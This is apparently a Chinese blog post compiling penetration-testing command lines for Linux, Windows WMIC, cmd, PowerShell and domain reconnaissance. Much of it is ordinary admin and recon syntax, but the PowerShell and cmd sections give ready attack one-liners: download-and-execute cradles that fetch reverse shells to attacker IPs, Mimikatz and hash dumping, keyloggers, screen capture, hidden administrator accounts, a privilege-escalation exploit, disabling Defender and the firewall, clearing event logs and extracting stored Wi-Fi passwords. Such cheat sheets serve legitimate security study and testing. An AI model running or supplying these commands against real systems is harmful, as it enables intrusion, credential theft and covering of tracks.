渗透命令行
2020-07-07 本文已影响0人
book4yi
本文仅作学习记录,如有侵权,请联系删除
Linux命令小结:
# 查看互联网出口IP及归属地址
curl cip.cc
#记录每条历史命令的执行时间和执行者
HISTTIMEFORMAT="%Y-%m-%d:%H-%M-%S:`whoami`:"
# 显示电脑以及操作系统的相关信息
uname -a
# 查看系统时间及运行时间
uptime
timedatectl
# 查看系统内核:
lsb_release -a
# 查看操作系统位数
getconf LONG_BIT
# 临时关闭history记录
(Space)set +o history
# 用户登录信息:
w
# 查看所有用户最后一次登录的时间及登录IP
lastlog
# 登录成功记录
last
# 登录失败记录
lastb
# 查看监听端口及网络连接:
netstat -antlpu
# arp表:
arp -ne
# 监听端口的进程:
lsof -i
# 监控ssh服务:
journalctl -u ssh.service -f
# 实时监控日志:
tail -f /var/log/apache2/access.log
tailf /var/log/apache2/access.log
less + F /var/log/apache2/access.log
# 查看计划任务:
cat /etc/crontab
crontab -l
# 列出所有服务:
systemctl list-units
# 识别文件类型:
file 1.jpg
# 查找某时间点之后新建的文件:
find /home/python-tool/ -newermt 2021-04-8q
# 以树状列出所有块设备,可以列出设备的容量大小信息
lsblk
# 查看网络流量状况,实时输出流入和留出系统的网络带宽数据
apt-get install nload
nload eth0
# 或者
apt-get install iftop
iftop
wmic命令小结:
- 查看windows机器版本和服务位数和.net版本:
wmic OS get Caption,CSDVersion,OSArchitecture,Version - 查看用户列表/组:
wmic useraccount list brief
wmic group list
wmic useraccount where "name='%UserName%'" call rename newUserName // 更改当前用户名
- 查询用户上次登录时间:
wmic netlogin get name,lastlogon,badpasswordcount - 查看系统中网卡的IP地址和MAC地址:
wmic nicconfig get ipaddress,macaddress - 查看计算机补丁安装详情
wmic qfe list
wmic qfe GET hotfixid
wmic qfe get Caption,Description,HotFixID,InstalledOn
- Windows 2003开启3389远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
- Windows 2008和Windows 2012开启远程桌面:
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
# 适于 Windows xp、server 2003
wmic /node:192.168.7.7 /user:administrator /password:1qaz@WSX PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
# 适于 Windows 7、8、10,server 2008、2012、2016,注意 ServerName 需要改为目标的 hostname
wmic /node:192.168.7.7 /user:administrator /password:1qaz@WSX RDTOGGLE WHERE ServerName='dc' call SetAllowTSConnections 1
或者
wmic /node:192.168.7.7 /user:administrator /password:1qaz@WSX process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
- 查看本机服务信息:
wmic service list brief - 列出进程:
Full显示所有、Brief显示摘要、Instance显示实例、Status显示状态
wmic process list brief
wmic process get processid,name,executablepath
-
查看某个进程的详细信息(包括命令行参数、路径等):
wmic process where name="chrome.exe" list full -
获取进程路径,PID,命令行参数等:
wmic process where name="java.exe" get executablepath,name,ProcessId,ParentProcessId,CreationDate,commandline /value -
根据pid获取进程的详细信息:
wmic process where ProcessId=3604 get ParentProcessId,commandline,processid,executablepath,name,CreationClassName,CreationDate -
查看某个进程的详细信息 (路径,命令行参数等):``
-
远程重启目标计算机:
wmic /node:192.168.7.7 /user:administrator /password:1qaz@WSX process call create "shutdown.exe -r -f -t 0" -
创建新进程
wmic process call create notepad
wmic process call create "C:\Program Files\Tencent\qq.exe"
wmic process call create "shutdown.exe -r -f -t 20"
wmic process call create "cmd.exe /c ipconfig > C:\temp\814ddasd.txt"
- 删除指定进程
wmic process where name="notepad.exe" delete
wmic process where name="qq.exe" call terminate
wmic process where processid="2316" delete
wmic process 2316 call terminate
-
删除C盘下的test目录:
wmic fsdir "c:\\test" call delete -
查看系统相关信息(domain/机器型号/机器名/用户名):
wmic computersystem list brief -
查看启动项
wmic startup get command,caption
wmic startup list full
wmic startup
wmic startup list brief
-
查看系统中开启的⽇志:
wmic nteventlog get path,filename,writeable -
查看共享:
wmic share get name,path,status -
查询本机所有盘符:
wmic logicaldisk list brief -
查看安装的软件版本:
wmic product get name,version -
查看是否为虚拟机:
wmic bios list full | find /i "vmware" -
查看域控:
wmic ntdomain list brief -
获取域内所有用户的 SID:
wmic useraccount get name,sid -
获取机器名:
wmic path win32_computersystem get dnshostname -
获取系统名称:
wmic path win32_operatingsystem get name -
查看系统32位还是64位:
wmic path win32_operatingsystem get osarchitecture -
获取系统域名:
wmic path win32_computersystem get domain -
获取AV详情:
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe -
枚举出整个系统中的所有可执行文件:
wmic process where "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath -
全盘搜索某文件并获取该文件所在目录:
for /f "skip=1 tokens=1*" %i in ('wmic datafile where "FileName='qq' and extension='exe'" get drive^,path' ) do (set "qPath=%i%j"&@echo %qPath:~0,-3%) -
查看当前系统是否有屏保保护,延迟是多少:
wmic desktop get screensaversecure,screensavertimeout
cmd命令小结:
- 查看系统版本:
ver - 重命名文件,可更改后缀名:
rename 1.txt 1.exe - 查询本机所有盘符:
fsutil fsinfo drives
用户相关操作:
net user
net localgroup administrators
启用用户:
net user Administrator /active:yes
net user guest /active:yes
修改用户密码,添加至管理员组:
net user Administrator xxxxxx
net user guest Qax@123
net localgroup administrators guest /add
net user test 123456 /add #添加用户名为test密码为123456的用户
net localgroup administrators test /add #把test用户提升至管理组
#拓展:
1、net不能用时 可以用net1 如net1 user jdq 123456 /add 效果一样,也可以复制net.exe为xxx.exe再执行
2、/add也可以用/ad代替 执行效果一样
3、使用$添加隐藏用户:net user jdq$ 123456 /add
-
查看当前工作目录:
cd -
检查自启动文件目录:
dir "%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
dir "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
dir "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup"
dir "%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "%userprofile%\Start Menu\Programs\Startup"
dir "C:\Windows\Start Menu\Programs\startup"
- 远程下载:
powershell (new-object Net.WebClient).DownloadFile('http://xx.xx.xx.xx:8000/32.exe','C:\Users\996\Desktop\66668.exe')
certutil -urlcache -split -f http://www.csrc.gov.cn/zjhpublic/g00306202/201802/p020180227601471717012.pdf C:\Windows\Temp\2.pdf
# bitsadmin适用于win7及以上
bitsadmin /transfer myDownLoadJob /download /priority normal "http://www.csrc.gov.cn/zjhpublic/g00306202/201802/p020180227601471717012.pdf" "C:\\users\\book4yi\\123.pdf"
-
创建一个文件夹 book4yi:
md book4yi -
查找多个类型的文件或某个文件:
# /A:显示具有指定属性的文件
# /S:显示指定目录和所有子目录中的文件
# /T:控制显示或用来分类的时间字符域 -A——上次访问时间 -C——上次访问时间 -W——上次写入时间
dir /A /S /T:A *.exe *.dll *.bat *.PS1 *.zip
-
是否支持powershell:
if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) -
查看进程:
tasklist /svc -
查看端口列表:
netstat -anop
-a 显示所有 -n 不用别名显示,只用数字显示 -p 显示进程号和进程名 -o 显示拥有的与每个连接关联的进程 ID。
- 查找2017/1/1之后创建的文件:
forfiles /p C:\ /M *.exe /S /D +2021/4/7 /C "cmd /c echo @fdate @ftime @path"
远程桌面相关:
#查看是否开启3389,0x1表示关闭,0x0表示开启
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
#修改注册表开启3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#或者
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#For Win2003:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#For Win2008:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 查看远程连接端口:
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
# 开启远程桌面(windows 2003):
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 开启远程桌面(windows 2008和windows 2012):
reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
-
查看系统体系结构:
echo %PROCESSOR_ARCHITECTURE% -
查看主机开机时间:
net statistics workstation -
查看当前在线用户:
query user || qwinsta -
获取本地管理员(通常含有域用户)信息:
net localgroup administrators -
查看本机共享列表和可访问的域共享列表:
net share -
查看所有服务状态
service --status-all
systemctl list-unit-files
-
合并多个文件:
type 1.txt 2.txt > output.txt -
列出或断开本地计算机与所连接的客户端之间的会话(要管理员权限):
net session -
查询路由表及所有可用接口的ARP(地址解析协议)缓存表
route print
arp -a
-
查看host文件:
type %SYSTEMROOT%\system32\drivers\etc\hosts -
查找文件大小>20MB的文件:
forfiles /S /M * /C "cmd /c if @fsize GEQ 2097152 echo @path @fsize" -
导出安全日志(管理员权限):
wevtutil epl Security "C:\Users\sws123\Desktop\Security-logs.evtx"
wevtutil epl System "C:\Users\sws123\Desktop\System-logs.evtx"
wevtutil epl Application "C:\Users\sws123\Desktop\Application-logs.evtx"
# 清除日志:
wevtutil cl Setup
wevtutil cl System
wevtutil cl Aplication
wevtutil cl security
wevtutil cl Forwarded Events
- 列出接口:
netsh wlan show interface
# 发现所有AP的配置文件,得到ssid,大概率能得到密码:
netsh wlan show profile
# 通过SSID找到Wifi密码:
netsh wlan show profile <SSID> key=clear
# 列出所有可连接wifi详细信息:
netsh wlan show networks mode=bssid
- 查看代理服务器设置:(可能需要管理员权限)
netsh winhttp show proxy
# 为cmd/powershell设置代理:
netsh winhttp set proxy 127.0.0.1:1080
# 取消代理:
netsh winhttp reset proxy
- 查看计划任务:
schtasks /query /fo list /v
# PS:如果遇到资源无法加载问题,则是由于当前活动页码所致
# 我们可以将活动页码修改为437即可:
chcp 437
-
递归查找某个文件:
cd /d E: && dir /b /s Logon.aspx -
递归查找文件内容:
findstr /si password config.* *.ini *.txt//查看后缀名文件中含有password关键字的文件 -
批量扫描内网存活主机,一般内网不会禁ICMP:
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl" -
批量查找B段存活主机,保存为批处理文件,虚拟机测试谨慎使用
@echo off
for /l %%i in (1,1,255) do (
for /l %%j in (1,25,255) do (
@ ping -w 1 -n 1 10.0.%%i.%%j | find /i "ttl="
)
)
- iptables列出所有规则:
iptables -vnL --line - 防火墙相关:
# 查看防火墙配置:
netsh firewall show config
#关闭防火墙
# windows server 2003 及之前的版本
netsh firewall set opmode disable
# windows server 2003 及之后的版本
netsh advfirewall set allprofiles state off
#修改防火墙配置:
#Windows Server 2003系统及之前版本,允许指定程序全部链接:
netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
#Windows server 2003 之后系统版本:
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C: \nc.exe"
#允许指定程序连出,命令如下:
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C: \nc.exe"
#允许 3389 端口放行:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
#自定义防火墙日志存储位置:
netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
# 启用防火墙日志功能:
netsh firewall set logging droppedpackets = enable
netsh firewall set logging connections = enable
powershell小结:
#下载文件
# powershell2.0 win7
powershell (New-Object Net.WebClient).DownloadFile('http://47.94.80.xxx/ps/a.ps1','E:\phpstudy_pro\WWW\a.ps1')
# powershell3.0及以上(win8之后),内置Invoke-WebRequest (wget)
wget "http://10.0.0.10/nc.exe" -outfile "nc.exe"`
#base64编码
$fileContent = "IEX(new-object System.Net.WebClient).DownloadString('http://www.igg.cas.cn/xwzx/kyjz/201404/W020140417581719774926.pdf')";
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
$encoded = [System.Convert]::ToBase64String($bytes);
$encoded
#查询计算机信息:
powershell Get-WmiObject -Class Win32_Operatingsystem
#查询BIOS信息(判断是否为虚拟机):
powershell Get-WmiObject -Class Win32_BIOS
#查看列出已安装的修补程序
powershell Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName .
powershell Get-WmiObject Win32_QuickFixEngineering
#关闭Windows自带的Defender防火墙(需要管理员权限):
powershell Set-MpPreference -DisableRealtimeMonitoring $true
#查看是否有AV
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
#cmd窗口下利用Powershell反弹NC shell :
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c vps-ip -p 8000 -e cmd
#查看域环境密码策略:
powershell Get-ADDefaultDomainPasswordPolicy
#查看安装软件以及版本
powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name, version"
#内置扫描端口(效率低)
powershell -c "1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\"10.211.55.10\",$_)) \"Port $_ is open!\"} 2>$null"
#查看PowerShell历史记录:
Get-Content (Get-PSReadlineOption).HistorySavePath
#查看共享
powershell Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share
#查看登录的用户
powershell Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
# powershell自身删日志:
Clear-Eventlog -LogName Aplication
Clear-Eventlog -LogName Security
Clear-Eventlog -LogName System
#反弹shell:
# 反弹cmd
powershell IEX (New-Object Net.Webclient).DownloadString('http://47.94.9.xx/ps/powercat.ps1'); powercat -c 192.168.203.140 -p 9999 -e cmd
# 反弹powershell
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
#反弹msf
powershell "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"
#提权加账号
powershell -c "& {Import-Module 'c:\Invoke-MS16-135.ps1';Invoke-MS16-135 -Application cmd.exe -commandline '/c net user test test!@#1234 /add'}"
#在线导出hash(需要管理员权限):
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes
#建立隐藏账户(需要管理员权限):
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Create-Clone.ps1'); Create-Clone -u demo$ -p test123 -cu cseroad
#mimikatz获取明文(需要管理员权限):
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
#判断是否是虚拟机
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxz/nishang/Gather/Check-VM.ps1');Check-VM
#扫描端口(需要切换到powershell环境):
IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.167.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389"
#查看各种信息:
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-Information.ps1');Get-Information
#获取wifi密码:
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-WLAN-Keys.ps1');Get-Wlan-Keys
#DNS反向解析:
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1');Invoke-ReverseDnsLookup '192.168.197.220-192.168.197.240'
#屏幕记录:
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/PowerSploit/Exfiltration/Get-TimedScreenshot.ps1');Get-TimedScreenshot -Path E:\ -Interval 5 -EndTime 10:00
#键盘记录:
IEX (New-Object Net.WebClient).DownloadString("http://47.94.80.xxx/ps/PowerSploit/Exfiltration/Get-Keystrokes.ps1");Get-Keystrokes -LogPath .\keylog.txt
内网渗透
# 查询当前计算机名、计算机全名、用户名、工作站、软件版本、工作站域、工作站域 DNS 名称、登录域
net config Workstation
#查询域控制器,查询域控制器主机名
net group "Domain controllers" /domain
#查看当前网络域环境,查询有几个域,判断当前网络是否存在域的手段之一
net view /domain
#通过上一个命令得到域环境后,查看某个域中的所有计算机主机名:
net view /domain:TESTER(域名)
# 查询域用户列表:
net user /domain
#查询域内所有用户组列表
net group /domain
#系统自带的常见组有:
Domain Admins:域管理员组。
Domain Computers:域内机器。
Domain Controllers:域控制器。
Domain Guest:域访客组,权限较低。
Domain Users:域用户。
Enterprise Admins:企业系统管理员用户
#查看域内管理员,查询域管理用户(DC上执行)
net group "domain admins" /domain
# 查看当前域内机器主机名:
net view
#查看域内控制器的机器名
nltest /DCLIST:xxx
#查看域控制器主机名:
Nslookup -type=SRV _ldap._tcp
#查看域内所有机器名(DC上执行)
net group "domain computers" /domain
#通过机器名获取IP:
tracert owa.god.org
#判断主域,一般域服务器都会同时作为时间服务器
net time /domain
#查看域控制器组
net group "Domain Controllers" /domain
